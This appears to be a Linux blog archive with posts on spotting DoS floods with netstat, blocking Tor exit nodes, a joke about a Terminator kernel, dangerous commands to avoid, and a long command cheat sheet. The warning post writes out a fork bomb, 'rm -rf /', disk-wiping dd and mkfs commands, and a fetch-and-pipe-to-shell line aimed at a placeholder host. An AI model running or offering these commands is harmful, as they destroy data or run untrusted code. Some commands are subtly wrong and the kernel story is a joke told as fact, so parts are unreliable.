Archive for the ‘linux’ Category

Ytv-Linuxour server appearing pretty slow could be many things from wrong configs, scripts and dodgy hardware – but sometimes it could be because someone is flooding your server with traffic known as DoS ( Denial of Service ) or DDoS ( Distributed Denial of Service ).

Denial-of-service attack (DoS attack) or Distributed Denial-of-service attack (DDoS attack) is an attempt to make a machine or network resource unavailable to its intended users. This attack generally target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers. DoS attacks are implemented by either forcing the targeted computer to reset, or consuming its resources so that it can no longer provide its services or obstructs the communication media between the users and the victim so that they can no longer communicate adequately.

In this small article you’ll see how to check if your server is under attack from the Linux Terminal with the netstat command

From the man page of netstat “netstat – Print network connections, routing tables, interface statistics, masquerade connections, and multicast memberships”

Some examples with explanation

netstat -na
This display all active Internet connections to the server and only established connections are included.

netstat -an | grep :80 | sort
Show only active Internet connections to the server on port 80, this is the http port and so it’s useful if you have a web server, and sort the results. Useful in detecting a single flood by allowing you to recognize many connections coming from one IP.

netstat -n -p|grep SYN_REC | wc -l
This command is useful to find out how many active SYNC_REC are occurring on the server. The number should be pretty low, preferably less than 5. On DoS attack incidents or mail bombs, the number can jump to pretty high. However, the value always depends on system, so a high value may be average on another server.

netstat -n -p | grep SYN_REC | sort -u
List out the all IP addresses involved instead of just count.

netstat -n -p | grep SYN_REC | awk ‘{print $5}’ | awk -F: ‘{print $1}’
List all the unique IP addresses of the node that are sending SYN_REC connection status.

netstat -ntu | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n
Use netstat command to calculate and count the number of connections each IP address makes to the server.

netstat -anp |grep ‘tcp|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n
List count of number of connections the IPs are connected to the server using TCP or UDP protocol.

netstat -ntu | grep ESTAB | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -nr
Check on ESTABLISHED connections instead of all connections, and displays the connections count for each IP.

netstat -plan|grep :80|awk {‘print $5’}|cut -d: -f 1|sort|uniq -c|sort -nk 1
Show and list IP address and its connection count that connect to port 80 on the server. Port 80 is used mainly by HTTP web page request.

How to mitigate a DOS attack

Once that you have found the IP that are attacking your server you can use the following commands to block their connection to your server:

iptables -A INPUT 1 -s $IPADRESS -j DROP/REJECT
Please note that you have to replace $IPADRESS with the IP numbers that you have found with netstat.
After firing the above command, KILL all httpd connections to clean your system and than restart httpd service by
using the following commands:

killall -KILL httpd

service httpd start #For Red Hat systems
/etc/init/d/apache2 restart #For Debian systems

 

tv crime2Internet trolls are using Tor nowadays to avoid bans by IP. However, banning Tor exit nodes is just slightly more complex. The Tor Project provides a regularly updated list of exit nodes that can access your IP here. As there may be many hundreds or even thousands of nodes, adding them to iptables can hurt your server’s network performance. Enter ipset, a user-space hash table for iptables:

# create a new set for individual IP addresses
ipset -N tor iphash
# get a list of Tor exit nodes that can access $YOUR_IP, skip the comments and read line by line
wget -q https://check.torproject.org/cgi-bin/TorBulkExitList.py?ip=$YOUR_IP -O -|sed '/^#/d' |while read IP
do
  # add each IP address to the new set, silencing the warnings for IPs that have already been added
  ipset -q -A tor $IP
done
# filter our new set in iptables
iptables -A INPUT -m set --match-set tor src -j DROP

Arnold-s-T-800-Terminator-Runs-Linux-Kernel-4-1

 

Back in February, when Linus Torvalds announced that it was time for the version 4.0 of Linux kernel, the Linux enthusiasts found an unlikely reason to be excited. Willing to know this reason? Around the same time, a Reddit user spotted that Skynet’s T-800 Terminator used by Arnold Schwarzenegger was actually running the same Linux kernel 4.1.15.

Earlier this week, Greg Kroah-Hartman released the Linux kernel 4.1.15. If we believe the Terminator movies, this release has brought Skynet closer to reality. It looks like Skynet knows why humans admire Linux.

If Linus Torvalds would have decided to walk on a straight line, the next logical kernel version after 3.19 would have been Linux 3.20 as kernel 4.0 wasn’t going to feature any massive change from Linux 3.19.

In the past, showing his love for Skynet, Linus Torvalds has made the following argument to support his decision:

The strongest argument for some people advocating 4.0 seems to have been a wish to see 4.1.15 – because “that was the version of Linux Skynet used for the T-800 terminator.

The time of 2.x and 3.x branch is now passed, and the 4.x branch is here with latest 4.1.15 release. Linux kernel 4.1.15 is the branch of 4.1.x LTS version and it’s available for download.

Read the kernel 4.1.15 changelog here and download it from Linux kernel archives right now.

 

http://www.geekboy.co

Linux shell or terminal commands are very powerful and just a simple command could lead one to delete a folder, files or root folder, etc. Linux never asks for confirmation rather it will execute the command right away causing you to lose useful data and information stored in these files and folders.

Take a look at the 9 commands and codes you should avoid executing.

1. Linux Fork Bomb Command

:(){ :|: & };: also known as Fork Bomb is a denial-of-service attack against a Linux System. :(){ :|: & };: is a bash function. Once executed, it repeats itself multiple times until the system freezes.

To get ride of this you need to restart or reboot your server. So be careful when executing this command on your Linux shell.

2. Mv Folder/Dev/Null Command

mv folder/dev/null is another risky command. Dev/null or null device is a device file that discards all the data written on it but it reports that the writing operation is executed successfully. It is also known as bit bucked or black hole.

3. Rm -Rf Command

rm -rf command is a to delete a folder and its content in the Linux operating system. If you don’t know how to use it then its very dangerous to the system. The most common combinations and options used with rm-rf command are listed below:

  • rm command is used to delete the files in Linux system.
  • rm -f command removes read-only files in folder without prompting.
  • rm -r command deletes the content of a folder recursively.
  • rm -d command is used to remove an empty directory but it will refuse to remove directory if it is not empty.
  • rm -rf/ command is used for forced deletion (it deletes it even if it’s write protected) of all the content in root directory and sub folders.
  • rm -rf* command is used for forced deletion of all the content in the current directory (directory you are currently working in) and sub folders.
  • rm -rf. command is used for forced deletion of all the content in the current folder and sub folders. The rm -r.[^.]* command can also be used.
  • rm -i command is used for removal of files and folders but a prompt will appear before removal.

4. Mkfs Command

mkfs can be a dangerous command for your Linux based system if you don’t know its purpose. Anything written after the mkfs will be formatted and replaced by a blank Linux file system.

The below given commands will format the hard drive and need administration power

  • mkfs
  • mkfs.ext3
  • mkfs.bfs
  • mkfs.ext2
  • mkfs.minix
  • mkfs.msdos
  • mkfs.reiserfs
  • mkfs.vfat
  • mkfs.cramfs ( No need of administration power)

5. Tar Bomb

The tar command is used combine many number of files to single file (archived file) in.tarformat. A Tape Archive (Tar) bomb can be created with this command.

It is an archive file which explodes into thousands or millions of files with names similar to the existing files into the current directory rather than into a new directory when untarred.

To avoid becoming a victim of a tar bomb by regularly creating a new protective directory whenever you receive a tar file and then moving the received tar file into this directory before untarring.If the tar file is indeed a tar bomb then you can simply remove the newly created directory to get rid of it.

Another way to avoid the explosion of a tar bomb is via the -t option to list all of the content of a tar file to give you an idea of the type of content contained within the tar file.

6. Dd Command

The dd command is used to copy & convert hard disk partitions. However, it can turn out to be harmful if you specify the wrong destination.

The command may be any one of these:

  • dd if=/dev/hda of=/dev/hdb
  • dd if=/dev/hda of=/dev/sdb
  • dd if=something of=/dev/hda
  • dd if=something of=/dev/sda
  • dd if=/dev/zero of=/dev/had (will zero out the whole primary hard drive)

7. Shell Script Code

Someone may victimize you by giving you the link to a shell script and endorsing you to download and execute it. The script may contain some malicious or dangerous code inside. The format of command may look like this: wget http://some_malicious_source -O- | sh. The wget will download the script while the sh downloads the script execution.

8. Malicious Source Code

Someone gives you the source code and asks you to compile it. The code may appear to be a normal code but in fact some malicious code is disguised in the large source code and it may cause harm to your system. To avoid being victimized by this kind of attack, only accept and compile your source code from trustworthy sources.

9. Decompression Bomb

You have received a compressed file and you are asked to extract this file which appears to be very small in size but may be a few KB. In fact, this small sized compressed file contains very highly compressed data.

Once the file is decompressed, hundreds of GB of data is extracted which can fill up your hard drive to bring down the performance of your system.

 

tv - programer

 

I know personally, I am not one of those people that can remember every detail of every language and never look anything up. It’s nice to have a cheat sheet with a quick summary of some of the most commonly used procedures, tags, tools, syntax, etc., saving time that would have been used to look it up on Google or dig through documentation either online or in printed text. The following is a list of links to several different cheat sheets on a wide variety of tasks and tools.

You can print them out and hang them on your wall (my personal choice) or simply bookmark them for easy access down the road. If you have any additional suggestions or see something I have missed, let me know…

 

Command Line

Windows Command Line Reference

BASH Command Line Reference

DOS Commands

 

Databases

MySQL Cheat Sheet

MySQL Reference List

Oracle Cheat Sheet

Oracle PL/SQL Cheat Sheet

Oracle 9i Server Reference (PDF)

Oracle 9i Command Reference

PostgreSQL Cheat Sheet

SQL Cheat Sheet

SQL Server 2005 Commands

 

Programming

Ada Syntax Card (PDF)

ASP/VBScript Cheat Sheet

C++ Language Summary

C++ Reference Sheet (PDF)

C++ Containers Cheat Sheet

C# Language Reference

Delphi Technical Reference Card (PDF)

Java Syntax Cheat Sheet

Java Quick Reference (PDF)

Java Reference for C++

JSP 2.0 Syntax Reference Sheet (PDF)

LaTEX Reference Card (PDF)

PERL Cheat Sheet

PERL Reference Card (PDF)

PERL Regular Expression Quick Reference (PDF)

PERL Reference Guide

PHP Cheat Sheet

PHP Developer Cheat Sheet

Python 101 Cheat Sheet

Python Cheat Sheet

Python Quick Reference (PDF)

Ruby Cheat Sheet (PDF)

Ruby Reference

Ruby on Rails Reference Sheet

 

Unix/Linux

Debian Linux Reference Guide (PDF)

Linux Shortcuts and Commands

One Page Linux Manual (PDF)

TCP Ports List

Treebeard’s Unix Cheat Sheet

Unix Command Line Tips

 

Web Development

Actionscript 2.0 Cheat Sheet (PDF)

Actionscript 3.0 Cheat Sheet (PDF)

CSS Cheat Sheet

CSS 2 Reference Card (PDF)

CSS Reference Sheet

CSS Shorthand Guide

CSS Useful Properties

Drupal 4.7 Cheat Sheet

.htaccess Cheat Sheet

HTML Cheat Sheet

HTML Dom Quick Reference Card (PDF)

Javascript Cheat Sheet

Javascript Quick Reference

Javascript Reference Page

JQuery Cheat Sheet (PDF)

JQuery Reference (PDF)

Mod_Rewrite Cheat Sheet

Scriptaculous Combination Effects Field Guide (PDF)

XHTML Cheat sheet

XHTML Reference

XHTML & HTML Cheat Sheet

XML Syntax Quick Reference (PDF)

XML Schema Reference (PDF)

XSLT and XPath Quick Reference (PDF)

 

Miscellaneous Topics

Ascii Codes Cheat Sheet

CVS Cheat Sheet

Regular Expressions Cheat Sheet

RGB Hex Colour Chart

Subversion Quick Reference (PDF)

Theoretical Computer Science Cheat Sheet (PDF)

UML Quick Reference Card (PDF)

UML Cheat Sheet

Vi Cheat Sheet

Vim Commands Cheat Sheet

XEmacs Commands Cheat Sheet

 

tv-Linux

Following on from a recent post Nmap Cheat Sheet’I have decided to create another cheat sheet but this time for GNU/Linux as I am constantly referring to it for reference. These kind of things are very handy as if you are like myself and don’t use Linux on a daily basis they can play a major part in jogging the little grey cells.

Download:  Cheat Sheet commands for GNU/Linux

CheatSheet commands for GNU / Linux

System Information

1. arch: show the architecture of the machine (1).
2. uname -m: show the architecture of the machine (2)..
3. uname -r: show the kernel version used.
4. dmidecode -q: display the components (hardware) system.
5. hdparm -i /dev/hda: show the characteristics of a hard disk.
6. hdparm -tT /dev/sda: make reading test on a hard disk.
7. cat /proc/cpuinfo: CPU information show.
8. cat /proc/interrupts: show interrupts.
9. cat /proc/meminfo: verify memory usage.
10. cat /proc/swaps: show swap files.
11. cat /proc/version: display the version of the kernel.
12. cat /proc/net/dev: network adapters and display statistics.
13. cat /proc/mounts: display the mounted file system.
14. lspci -tv: show PCI devices.
15. lsusb -tv: show USB devices.
16. date: display the system date.
17. cal 2013: show calendar 2013.
18. cal 07 2013: show the calendar for the month July 2013.
19. date 041217002013.00: place (declare, set) date and time.
20. clock -w: save changes to the BIOS date.

Shutdown (Reset System or Log out)

1. shutdown -h now: Shut down system (1).
2. init 0: Shut down system (2).
3. telinit 0: Shut down system (3).
4. halt: shutdown the system (4).
5. shutdown -h hours:minutes &: planned shutdown of the system.
6. shutdown -c: cancel a planned shutdown of the system.
7. shutdown -r now: Restart (1).
8. reboot: Reboot (2).
9. logout: close session.

Files and Directories

1. cd /home: enter the “home” directory.
2. cd ..: go back one level.
3. cd ../..: back 2 levels.
4. cd: go to the root directory.
5. cd ~user1: go to directory user1.
6. cd -: go (back) to the previous directory.
7. pwd: : show the path of the working directory.
8. ls: see the files in a directory.
9. ls -F: see the files in a directory.
10. ls -l: show details of files and folders in a directory.
11. ls -a: show hidden files.
12. ls *[0-9]*: show the files and folders that contain numbers.
13. tree: display files and folders in a tree starting from the root. (1)
14. lstree: display files and folders in a tree starting from the root. (2)
15. mkdir dir1: create a folder or directory called ‘dir1’.
16. mkdir dir1 dir2: create two folders or directories simultaneously (Create two directories at once)
17. mkdir -p /tmp/dir1/dir2: create a directory tree.
18. rm -f file1: delete the file called file1.
19. rmdir dir1: delete the folder called dir1.
20. rm -rf dir1: delete a folder called dir1 with its contents recursively.
21. rm -rf dir1 dir2: delete two folders (directories) with its contents recursively.
22. mv dir1 new_dir: rename or move a file or folder (directory).
23. cp file1: copy a file.
24. cp file1 file2: copy two files together.
25. cp dir /* . : copy all the files in a directory within the current working directory.
26. cp -a /tmp/dir1 . : copy a directory within the current working directory.
27. cp -a dir1: copy a directory.
28. cp -a dir1 dir2: copy two directories.
29. ln -s file1 lnk1: create a symbolic link to the file or directory.
30. ln file1 lnk1: creating a physical link to the file or directory.
31. touch -t 0712250000 file1: modify the real time (time of creation) of a file or directory.
32. file file1: output (screen dump)
33. iconv -l: lists of known encryption.
34. iconv -f fromEncoding -t toEncoding inputFile > outputFile: creates a new form of the input file is encoded in assuming and making a ToEncoding fromEncoding.
35. find . -maxdepth 1 -name *.jpg -print -exec convert ”{}” -resize 80×60 “thumbs/{}” \;: grouping resized files in the current directory and send them to directories in thumbnail view (requires converting from ImageMagick).

Finding Files

1. find / -name file1: file and directory search from the root of the system.
2. find / -user user1: find files and directories belonging to user user1.
3. find /home/user1 -name \*.bin: search files with extension ‘. bin ‘directory within it’ / home/user1.
4. find /usr/bin -type f -atime +100: look at binary files used in the last 100 days.
5. find /usr/bin -type f -mtime -10: find the changed files created within the last 10 days.
6. find / -name \*.rpm -exec chmod 755 ‘{}’ \;: look for files with extension. ‘rpm’ and change permissions.
7. find / -xdev -name \*.rpm: Find files with extension ‘. rpm’ ignoring them removable devices such as cdrom, pen-drive, etc ….
8. locate \*.ps: find files with extension. ‘ps’ primarily executed with the command ‘updatedb’.
9. whereis halt: show the location of a binary file. In this case you are wondering Where he command ‘halt’
10. which halt: show the full path (full path to it) to a binary / executable.

Mounting a file system

1. mount /dev/hda2 /mnt/hda2: mount a disk called hda2. Check first the existence of the directory ‘/ mnt/hda2?, If not, create it.
2. umount /dev/hda2: removing a disk called hda2. Out first from point ‘/ mnt/hda2.
3. fuser -km /mnt/hda2: force umount when the device is busy.
4. umount -n /mnt/hda2: running disassembly without reading the file / etc / mtab. Useful when the file is read-only or the hard drive is full.
5. mount /dev/fd0 /mnt/floppy: mount a floppy disk (floppy).
6. mount /dev/cdrom /mnt/cdrom: mount a cdrom / dvdrom.
7. mount /dev/hdc /mnt/cdrecorder: mount a rewritable cd or dvdrom.
8. mount /dev/hdb /mnt/cdrecorder: mount a rewritable cd / dvdrom (a dvd).
9. mount -o loop file.iso /mnt/cdrom: mount a file or iso image.
10. mount -t vfat /dev/hda5 /mnt/hda5: mount a FAT32 file system.
11. mount /dev/sda1 /mnt/usbdisk: mount a usb thumb drive or a memory (without specifying the filesystem type).

Hard Disk Space

1. df -h: display a list of mounted partitions.
2. ls -lSr |more: show the size of the files and directories sorted by size.
3. du -sh dir1: Estimate the space used by the directory dir1.
4. du -sk * | sort -rn: show the size of the files and directories sorted by size.
5. rpm -q -a –qf ‘%10{SIZE}t%{NAME}n’ | sort -k1,1n: show space used by the installed rpm packages organized by size (Fedora, Redhat and others).
6. dpkg-query -W -f=’${Installed-Size;10}t${Package}n’ | sort -k1,1n: show space used by the packages installed, organized by size (Ubuntu, Debian and others) .

Users and Groups

1. groupadd name_of_the_group: create a new group.
2. groupdel name_of_the_group: delete a group.
3. groupmod -n new_name_of_the_group old_name_of_the_group: rename a group.
4. useradd -c “Name Surname ” -g admin -d /home/user1 -s /bin/bash user1: Create a new user belonging to the “admin”.
5. useradd user1: create a new user.
6. userdel -r user1: delete a user (‘-r’ eliminates home directory).
7. usermod -c “User FTP” -g system -d /ftp/user1 -s /bin/nologin user1: change user attributes.
8. passwd: Changing password.
9. passwd user1: change the password of a user (only root).
10. chage -E 2013-12-31 user1: place a time limit for the user’s password. In this case says that the key expires on December 31, 2013.
11. pwck: correct syntax check the file format of ‘/ etc / passwd’ and the existence of users.
12. grpck: check correct syntax and format of the file ‘/ etc / group’ and the existence of groups.
13. newgrp group_name: Registers a new group to change the default group of newly created files.

File Permissions (Use “+” to place permissions and “-” to remove)

1. ls -lh: Show permissions.
2. ls /tmp | pr -T5 -W$COLUMNS: Terminal divided into 5 columns.
3. chmod ugo+rwx directory1: : enable read permissions (r) , write (w) and execute (x) to the owner (u) group (g) and others (o) on the directory ‘directory1
4. chmod go-rwx directory1: remove read permission (r), write (w) and (x) running the group (g) and others (o) on the directory ‘directory1
5. chown user1 file1: cchange owner of a file.
6. chown -R user1 directory1: change the owner of a directory and all files and directories contained within.
7. chgrp group1 file1: changing group of files.
8. chown user1:group1 file1: change user and group ownership of a file.
9. find / -perm -u+s: display all system files with SUID configured.
10. chmod u+s /bin/file1: set the SUID bit on a binary file. The user that running that file takes the same privileges as the owner.
11. chmod u-s /bin/file1: disable SUID bit on a binary file.
12. chmod g+s /home/public: place a SGID bit on a directory-similar to SUID but for directory.
13. chmod g-s /home/public: disable SGID bit on a directory.
14. chmod o+t /home/public: place a bit STIKY in a directory. Allows deletion of files only rightful owners.
15. chmod o-t /home/public: STIKY disable bit in a directory.


Special Attributes on files (Use “+” to place permissions and “-” to remove)

1. chattr +a file1: allows to writte by opening a file only append mode.
2. chattr +c file1: allows a file to be compressed / decompressed automatically.
3. chattr +d file1: ensures that the program ignore delete files during backup.
4. chattr +i file1: convert the file unchanged, so it can not be removed, altered, renamed, or bound.
5. chattr +s file1: allows a file to be deleted safely.
6. chattr +S file1: ensures that a file is modified, the changes are written in synchronous mode as with sync.
7. chattr +u file1: allows you to restore the contents of a file even if it is canceled.
8. lsattr: show special attributes.


Compressed files

1. bunzip2 file1.bz2: decompress in file called ‘file1.bz2.
2. bzip2 file1: compress a file called file1.
3. gunzip file1.gz: decompress a file called ‘file1.gz.
4. gzip file1: compress a file called ‘file1.
5. gzip -9 file1: compress with maximum compression.
6. rar a file1.rar test_file: create a zip file called ‘file1.rar’.
7. rar a file1.rar file1 file2 dir1: compress ‘file1,’ file2 and ‘dir1Simultaneously.
8. rar x file1.rar: decompress rar file.
9. unrar x file1.rar: decompress rar file.
10. tar -cvf archive.tar file1: create an uncompressed tarball.
11. tar -cvf archive.tar file1 file2 dir1: create an archive containing ‘file1,file2 and dir1.
12. tar -tf archive.tar: show contents a file.
13. tar -xvf archive.tar: extract a tarball.
14. tar -xvf archive.tar -C /tmp: extract a tarball in / tmp.
15. tar -cvfj archive.tar.bz2 dir1: create a tarball compressed into bzip2.
16. tar -xvfj archive.tar.bz2: decompress a bzip2 compressed tar file.
17. tar -cvfz archive.tar.gz dir1: create a gzip tarball.
18. tar -xvfz archive.tar.gz: decompress a gzip compressed tar archive.
19. zip file1.zip file1: create a zip file.
20. zip -r file1.zip file1 file2 dir1: compress in zip several files and directories simultaneously.
21. unzip file1.zip: decompress a zip file.


RPM Packages (Red Hat, Fedora…etc)

1. rpm -ivh package.rpm: install an rpm package.
2. rpm -ivh –nodeeps package.rpm: installing an rpm package ignoring dependencies requests.
3. rpm -U package.rpm: upgrade a rpm package without changing configuration files.
4. rpm -F package.rpm: upgrade a rpm package only if it is installed.
5. rpm -e package_name.rpm: remove a rpm package.
6. rpm -qa: show all rpm packages installed on the system.
7. rpm -qa | grep httpd: show all rpm packages with the name “httpd”.
8. rpm -qi package_name: get information on a specific package installed.
9. rpm -qg “System Environment/Daemons”: show rpm packages of a software group.
10. rpm -ql package_name: show list of files given by a rpm package installed.
11. rpm -qc package_name: show configuration files list given by a rpm package installed.
12. rpm -q package_name –whatrequires: show list of dependencies required for a rpm package.
13. rpm -q package_name –whatprovides: show the capacity provided by a rpm package.
14. rpm -q package_name –scripts: scripts show started during installation / removal.
15. rpm -q package_name –changelog: display the history of revisions of a rpm package.
16. rpm -qf /etc/httpd/conf/httpd.conf: check which rpm package belongs to a given file.
17. rpm -qp package.rpm -l: show list of files given by a rpm package not yet been installed.
18. rpm –import /media/cdrom/RPM-GPG-KEY: Import digital signature public key.
19. rpm –checksig package.rpm: verify the integrity of a package rpm.
20. rpm -qa gpg-pubkey: verify the integrity of all rpm packages installed.
21. rpm -V package_name: check the file size, licenses, rates, owner, group, check MD5 digest and last modified.
22. rpm -Va: check all rpm packages installed on the system. Use with caution.
23. rpm -Vp package.rpm: verify a rpm package not yet installed.
24. rpm2cpio package.rpm | cpio –extract –make-directories *bin*: extracting executable file from a rpm package.
25. rpm -ivh /usr/src/redhat/RPMS/`arch`/package.rpm: install a package built from a source rpm.
26. rpmbuild –rebuild package_name.src.rpm: build a rpm package from a source rpm.


YUM packages updater (Red Hat, Fedora…etc)

1. yum install package_name: download and install a rpm package..
2. yum localinstall package_name.rpm: This will install an RPM and attempt to resolve all dependencies for you, using your repositories.
3. yum update package_name.rpm: update all rpm packages installed on the system.
4. yum update package_name: upgrade a rpm package.
5. yum remove package_name: remove a rpm package.
6. yum list: list all packages installed on the system.
7. yum search package_name: Find a package repository rpm.
8. yum clean packages: clean a cache erasing downloaded packages.
9. yum clean headers: remove all header files that the system uses to resolve the dependency.
10. yum clean all: delete from the cache packages and header files.

Deb packages (Debian, Ubuntu…etc)

1. dpkg -i package.deb: upgrade a deb package.
2. dpkg -r package_name: remove a deb package.
3. dpkg -l: show all deb packages installed on the system.
4. dpkg -l | grep httpd: show all deb packages with the name “httpd”
5. dpkg -s package_name: to obtain information on a specific package installed on the system.
6. dpkg -L package_name: show list of files given by a package installed on the system.
7. dpkg –contents package.deb: show list of files given by a package not yet installed.
8. dpkg -S /bin/ping: check which package owns a given file.

APT packages updater (Debian, Ubuntu …etc)

1. apt-get install package_name: install / upgrade a deb package.
2. apt-cdrom install package_name: install / upgrade a deb package from cdrom.
3. apt-get update: update the package list.
4. apt-get upgrade: update all installed packages
5. apt-get remove package_name: remove a deb package.
6. apt-get check: check the correct resolution of dependencies.
7. apt-get clean: clean up cache from packages downloaded.
8. apt-cache search searched-package: returns list of packages that corresponds to the series’ wanted packages. ”

View the contents of a file

1. cat file1: view the contents of a file starting from the first row.
2. tac file1: view the contents of a file starting from the last line.
3. more file1: view content along a file.
4. less file1: command like ‘more’ but can save the file movement and backward movement.
5. head -2 file1: see the first two lines of a file.
6. tail -2 file1: see the last two lines of a file.
7. tail -f /var/log/messages: see in real time what has been added to the file.

Text Manipulation

1. cat file1 file2 .. | command <> file1_in.txt_or_file1_out.txt: general syntax for text manipulation using PIPE, STDIN and STDOUT.
2. cat file1 | command( sed, grep, awk, grep, etc…) > result.txt: general syntax to manipulate a text from a file and write the output to a new file.
3. cat file1 | command( sed, grep, awk, grep, etc…) » result.txt: general syntax to manipulate a text from a file and add result in an existing file.
4. grep Aug /var/log/messages: search words “Aug” on file ‘/ var / log / messages’.
5. grep ^Aug /var/log/messages: look for words that begin with “Aug” on file ‘/ var / log / messages’
6. grep [0-9] /var/log/messages: select all lines in the file ‘/ var / log / messages’ that contain numbers.
7. grep Aug -R /var/log/*: search for the string “Aug” in directory ‘/ var / log’ and below.
8. sed ‘s/stringa1/stringa2/g’ example.txt: relocate “string1” with “string2” in example.txt
9. sed ‘/^$/d’ example.txt: delete all blank lines from the example.txt
10. sed ‘/ *#/d; /^$/d’ example.txt: Remove comments and blank lines example.txt
11. echo ‘esempio’ | tr ‘[:lower:]‘ ‘[:upper:]‘: convert lowercase to uppercase
12. sed -e ’1d’ result.txt: deletes the first line of the file sample.txt
13. sed -n ‘/stringa1/p’: display only lines that contain the word “string1”.

Character set and file conversion

1. dos2unix filedos.txt fileunix.txt: convert a text file format from MSDOS to UNIX.
2. unix2dos fileunix.txt filedos.txt: convert a text file format from UNIX to MSDOS.
3. recode ..HTML < page.txt > page.html: convert a text file to html.
4. recode -l | more: show all available format conversions.

Analysis of the file systems

1. badblocks -v /dev/hda1: Check for bad blocks on disk hda1.
2. fsck /dev/hda1: repair / check integrity Linux system file on disk hda1.
3. fsck.ext2 /dev/hda1: repair / check integrity ext 2 file system on disk hda1.
4. e2fsck /dev/hda1: repair / check integrity ext 2 file system on disk hda1.
5. fsck.ext3 /dev/hda1: repair / check integrity ext 3 file system on disk hda1.
6. fsck.vfat /dev/hda1: repair / check integrity ext 3 file system on disk hda1.
7. fsck.msdos /dev/hda1: repair / check integrity of a file from MSDOS system on disk hda1.
8. dosfsck /dev/hda1: repair / check integrity of a file from a DOS system on disk hda1.

Formatting a filesystem

1. mkfs /dev/hda1: create a Linux file system on the partition hda1.
2. mke2fs /dev/hda1: create a system file type on the partition hda1
3. mke2fs -j /dev/hda1: create a Linux file system type ext3 (journal) on hda1 partition.
4. mkfs -t vfat 32 -F /dev/hda1: ccreate a FAT32 file system on hda1.
5. fdformat -n /dev/fd0: flooply format a disk.
6. mkswap /dev/hda3: create a swap file system.

Working with SWAP

1. mkswap /dev/hda3: create a swap file system.
2. swapon /dev/hda3: activate a new swap partition.
3. swapon /dev/hda2 /dev/hdb3: activate two swap partitions.

Backup

1. dump -0aj -f /tmp/home0.bak /home: make a complete backup directory ‘/ home’.
2. dump -1aj -f /tmp/home0.bak /home: make incremental backup directory ‘/ home’.
3. restore -if /tmp/home0.bak: restoring a backup interactively.
4. rsync -rogpav –delete /home /tmp: synchronization between directories.
5. rsync -rogpav -e ssh –delete /home ip_address:/tmp: rsync through SSH tunnel.
6. rsync -az -e ssh –delete ip_addr:/home/public /home/local: synchronize a local directory with a remote directory via ssh and compression.
7. rsync -az -e ssh –delete /home/local ip_addr:/home/public: Synchronize a remote directory with a local directory via ssh and compression.
8. dd bs=1M if=/dev/hda | gzip | ssh user@ip_addr ‘dd of=hda.gz’: make a backup on a hard disk on a remote host via ssh.
9. dd if=/dev/sda of=/tmp/file1: save the contents of a hard drive to a file. (In this case the hard drive is “sda” and the file “file1”).
10. tar -Puf backup.tar /home/user: make incremental backup directory ‘/ home / user’.
11. ( cd /tmp/local/ && tar c . ) | ssh -C user@ip_addr ‘cd /home/share/ && tar x -p’: copy the contents of a directory on a remote directory via ssh.
12. ( tar c /home ) | ssh -C user@ip_addr ‘cd /home/backup-home && tar x -p’: copy a local directory on a remote directory via ssh.
13. tar cf – . | (cd /tmp/backup ; tar xf – ): local copy preserving permits and links from one directory to another.
14. find /home/user1 -name ‘*.txt’ | xargs cp -av –target-directory=/home/backup/ –parents: finding and copying all files with ‘. txt’ from one directory to another.
15. find /var/log -name ‘*.log’ | tar cv –files-from=- | bzip2 > log.tar.bz2: find all files with ‘. log’ and make a bzip file.
16. dd if=/dev/hda of=/dev/fd0 bs=512 count=1: make a copy of MRB (Master Boot Record) to floppy.
17. dd if=/dev/fd0 of=/dev/hda bs=512 count=1: restore the backup of the MBR (Master Boot Record) saved on a floppy.

CD-ROM

1. cdrecord -v gracetime=2 dev=/dev/cdrom -eject blank=fast -force: clean or erase a rewritable cd.
2. mkisofs /dev/cdrom > cd.iso: create an iso image of cdrom on disk.
3. mkisofs /dev/cdrom | gzip > cd_iso.gz: create a compressed iso image of cdrom on disk.
4. mkisofs -J -allow-leading-dots -R -V “Label CD” -iso-level 4 -o ./cd.iso data_cd: create an iso image from a directory.
5. cdrecord -v dev=/dev/cdrom cd.iso: burn an iso image.
6. gzip -dc cd_iso.gz | cdrecord dev=/dev/cdrom -: burn an iso image compression.
7. mount -o loop cd.iso /mnt/iso: mount an iso image.
8. cd-paranoia -B: take songs from a cd to wav files.
9. cd-paranoia – ”-3”: take the first 3 songs from a CD to wav files.
10. cdrecord –scanbus: scan bus to identify the channel scsi.
11. dd if=/dev/hdc | md5sum: to run an md5sum in a device such as a cd.

LAN and Wi-Fi

1. ifconfig eth0: show the configuration of an Ethernet network card.
2. ifup eth0: activate an interface ‘eth0’
3. ifdown eth0: disable an interface ‘eth0’
4. ifconfig eth0 192.168.1.1 netmask 255.255.255.0: set an IP address.
5. ifconfig eth0 promisc: configure ‘eth0’ common mode for packets (sniffing).
6. dhclient eth0: active interface ‘eth0’ dhcp mode.
7. route -n: show route table
8. route add -net 0/0 gw IP_Gateway: default input configuration.
9. route add -net 192.168.0.0 netmask 255.255.0.0 gw 192.168.1.1: Configure static route for network search ‘192 .168.0.0/16’
10. route del 0/0 gw IP_gateway: remove the static route.
11. echo “1” > /proc/sys/net/ipv4/ip_forward: enable ip route.
12. hostname: display the system hostname.
13. host http://www.example.com: hostname search to resolve the name to an IP address (1).
14. nslookup http://www.example.com: find the host name to resolve the name to an IP address and vice versa (2)
15. ip link show: show the link status of all interfaces.
16. mii-tool eth0: show the link status of ‘eth0’
17. ethtool eth0: display statistics for ‘eth0’.
18. netstat -tup: show all active network connections and their PID.
19. netstat -tupl: show all network services listening on the system and its PID.
20. tcpdump tcp port 80: show all HTTP traffic.
21. iwlist scan: show wireless networks.
22. iwconfig eth1: show the configuration of a wireless network card.
23. whois http://www.example.com: search Whois database.

Microsoft Windows Networks (SAMBA)

1. nbtscan ip_addr: net bios name resolution.
2. nmblookup -A ip_addr: net bios name resolution.
3. smbclient -L ip_addr/hostname: show remote actions of a windows host.


IP Tables (FIREWALL)

1. iptables -t filter -L: show all chains of the filter table.
2. iptables -t nat -L: show all chains of the nat table.
3. iptables -t filter -F: clear all rules from the filter table.
4. iptables -t nat -F: clean all nat table rules.
5. iptables -t filter -X: delete any user-created chain.
6. iptables -t filter -A INPUT -p tcp –dport telnet -j ACCEPT: allow input telnet connections.
7. iptables -t filter -A OUTPUT -p tcp –dport http -j DROP: block output HTTP connections.
